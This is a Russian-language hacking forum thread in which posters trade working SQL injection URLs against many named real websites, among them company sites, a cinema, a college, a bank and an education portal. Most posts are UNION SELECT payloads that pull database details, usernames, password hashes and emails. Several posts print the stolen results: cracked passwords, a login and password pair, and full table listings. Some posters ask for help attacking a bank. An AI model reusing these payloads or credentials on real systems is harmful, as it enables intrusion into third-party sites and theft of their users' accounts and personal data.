Никаких извращений не будет, после того как переберу всю тему, поставлю поисковый скрипт- там и будем чекать
Зачем вы тратите свои время и усилия? Прежде чем просто постить в тему надо на гугле делать проверку типа иногда прокатывает только А тем кто постит бояны минус ставить. И всё. В правила темы внести это предупреждение
www.stroyzona.com Code: http://www.stroyzona.com/warelist.php3?id=-1800+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3/* www.rocit.ru Code: http://www.rocit.ru/news/shownews.php3?id=-30598+union+select+1,2,3,4,5,6,7,concat(version(),char(58,58),database(),char(58,58),user()),9,10/*
Code: http://coce.samhsa.gov/cod_resources/index.aspx?obj=42+or+1=@@version-- Можно покавырять, но мне не хочиться! me/ боиться! В процесе поиска: Code: http://www.terjemar.net/dict5.php?baseid=-928+union+select+1,2,3/* для тех у кого много трафа!
Хочу добавить по Этому Сайтику.... Нашёл ещё 1 табличку: phorum_users Запрос Code: director-online.com/buildArticle.php? POST: id=-2+UNION+SELECT+1,2,3,4,5,concat(username,char(58),password),7,8+FROM+phorum_users/* ========= Для id=1 username: !aaf hash: 1b207465eac83b5d4b12e335faa0b53a crackHash: paula ======== Также Колонки для этой таблички Code: id name username password emai webpage image icq aol yahoo msn jabber signature hide_email permission_level max_group_permission_level lang password_tmp
один из кинотеатров Питера =) kolizey.spb.ru Code: http://www.kolizey.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(login,0x3a,password,0x3a,email),18+from+user/*&lang=eng юзер:пасс:мыло там еще есть таблица 'guestbook', колонка вроде 'email', но я не уверен, копаться не стал.
www.efimov-partners.ru Code: http://www.efimov-partners.ru/vacancy/?rubric=-47+union+select+concat(version(),char(58,58),database(),char(58,58),user())/* www.santechmart.ru Code: http://www.santechmart.ru/print.php?id=-1+union+select+concat(version(),char(58,58),database(),char(58,58),user())/* www.yurclub.ru Code: http://www.yurclub.ru/catalog/geo.list.php?s=-11000+union+select+1,concat(version(),char(58,58),database(),char(58,58),user())/*&r=0&PHPSESSID=d974a3bb28fedf99bf678190478bb00b www.ladofon.ru Code: http://www.ladofon.ru/news_detail.php?news_id=-69+union+select+1,2,3,concat(version(),char(58,58),database(),char(58,58),user()),5,6,7,8/* http://www.staldveri.ru Code: http://www.staldveri.ru/products/popup.php?id=-2+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3,4,5,6,7/* www.spbgid.ru Code: http://www.spbgid.ru/index.php?type=-1+union+select+1,convert(concat(version(),char(58,58),database(),char(58,58),user())%20using%20cp1251),3/*
Достали в игрушки играть давайте. http://quest.mini-rinok.ru/index.php?id=1 http://quest.mini-rinok.ru/index.php?id=2 http://quest.mini-rinok.ru/index.php?id=2-1 Кто составит корректный запрос +20 от меня.
http://www.prokredo.ru/collegefaculty.php?id=50%20union%20select%201,concat(login,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14%20FROM%20kredo_admins/* ------------------------------- sql password mooncat login ------------------------------ TABLES: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES,VIEWS, kredo_activity, kredo_admins, kredo_albums, kredo_article, kredo_college, kredo_company, kredo_contacts, kredo_doc, kredo_faculty, kredo_links, kredo_media, kredo_news, kredo_opinions, kredo_pages, kredo_partner, kredo_photo, kredo_presskit, kredo_publications, kredo_questions, kredo_represents,kredo_sections, kredo_students, kredo_vacancy, prokredo_forum_auth_access, prokredo_forum_banlist, prokredo_forum_categories, prokredo_forum_config, prokredo_forum_confirm, prokredo_forum_disallow, prokredo_forum_forum_prune, prokredo_forum_forums, prokredo_forum_groups, prokredo_forum_posts, prokredo_forum_posts_text, prokredo_forum_privmsgs, prokredo_forum_privmsgs_text, prokredo_forum_ranks, prokredo_forum_search_results, prokredo_forum_search_wordlist, prokredo_forum_search_wordmatch, prokredo_forum_sessions, prokredo_forum_sessions_keys, prokredo_forum_smilies, prokredo_forum_themes, prokredo_forum_themes_name, prokredo_forum_topics, prokredo_forum_topics_watch, prokredo_forum_user_group, prokredo_forum_users, prokredo_forum_vote_desc, prokredo_forum_vote_results, prokredo_forum_vote_voters, prokredo_forum_words --------------- COLUMNS: Code: CHARACTER_SET_NAME, DEFAULT_COLLATE_NAME, DESCRIPTION, MAXLEN, COLLATION_NAME http://quest.mini-rinok.ru/index.php?id=1 cash, а ты уверен что там можно что-то сделать?
я её сделал когда там ещё недостаточная фильтрация была),а потом нет. Мне киборг подскзывал как там делать надо, но я так и не смог((, видимо мало над этим думал, надо будет как нибудь на досуге этим занятся. несмог таблицы подобрать. префикс rabotamania_
ну и я заодно подкину http://alia.org.au/publishing/incite/2006/06/print.html?ID=68%20union%20select%201,2,3,4,5,6,7,8,9,10,concat(password,char(58),user),12,13,14,15,16,17%20from%20mysql.user/*
смотри там и киборг побывал: Code: http://quest.mini-rinok.ru/index.php?id=1%0bunion%0bselect%0bconcat(username,char(58),password)%0bfrom%0busers/* k1b0rg:599745
хах,типа авторские права на скули? http://www.invest-em.ru/it/lib/article.php?id=-391+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3/* http://www.lineonline.ws/detail.php?id=14756'+union+select+1, 2/* http://www.brunet.ws/detail.php?id=6071'+union+select+1, 2/* сёдня както маловато (
VisionLearning.com 31000 users Code: http://www.visionlearning.com/library/flash_viewer.php?oid=-1+union+select+1,concat(username,0x3a,password,0x3a,email),3,4,city+from+users+limit+31000,31001/* Code: http://kras.ru/pop_news.php?winid=-1+union+select+COLUMN_NAME,2,3,4+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(108,101,103,97,108)/* Code: http://ara.com.ua/onenews.php?oid=-1+union+select+1,2,3,user(),5,6,database()/*
какой-то банк! помогите подобрать таблицу http://www.nskbl.ru/tariff/plans/?id=7&data_id=900-9%20union%20select%201,2,3,4,5,6/*
